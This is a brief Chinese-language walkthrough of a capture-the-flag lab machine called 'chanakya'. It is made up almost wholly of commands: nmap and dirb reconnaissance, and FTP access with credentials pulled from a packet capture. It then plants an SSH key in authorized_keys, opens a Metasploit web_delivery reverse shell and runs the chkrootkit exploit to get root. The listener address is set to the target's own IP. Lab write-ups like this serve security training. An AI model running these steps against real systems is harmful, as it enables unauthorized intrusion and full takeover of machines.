chanakya
1.信息收集
nmap -sP 192.168.14.0/24
nmap -sV -p- 192.168.14.186
dirb http://192.168.14.186 -X ".txt,.php"
wget http://192.168.14.186/abuse.txt
<?php
echo str_rot13("nfubxn.cpncat")
?>
wget http://192.168.14.186/ashoka.pcapng
ashoka;kautilya
ftp 192.168.14.186
2.漏洞利用
ssh-keygen
cd /root/.ssh
mv id_rsa.pub authorized_keys
lcd /root/.ssh
mkdir .ssh
cd .ssh
put authorized_keys
ssh ashoka@192.168.14.186
3.提权
首先,利用反弹shell模块,为我们提供一个在目标机器上的meterpreter。
search web_de
use exploit/multi/script/web_delivery
set lhost 192.168.14.186
set lport 3333
set uripath /
exploit 生成
下面进行提权模块利用,成功利用 Chkrootkit模块提权root
back
search chkrootkit
use exploit/unix/local/chkrootkit
set sessions 1
run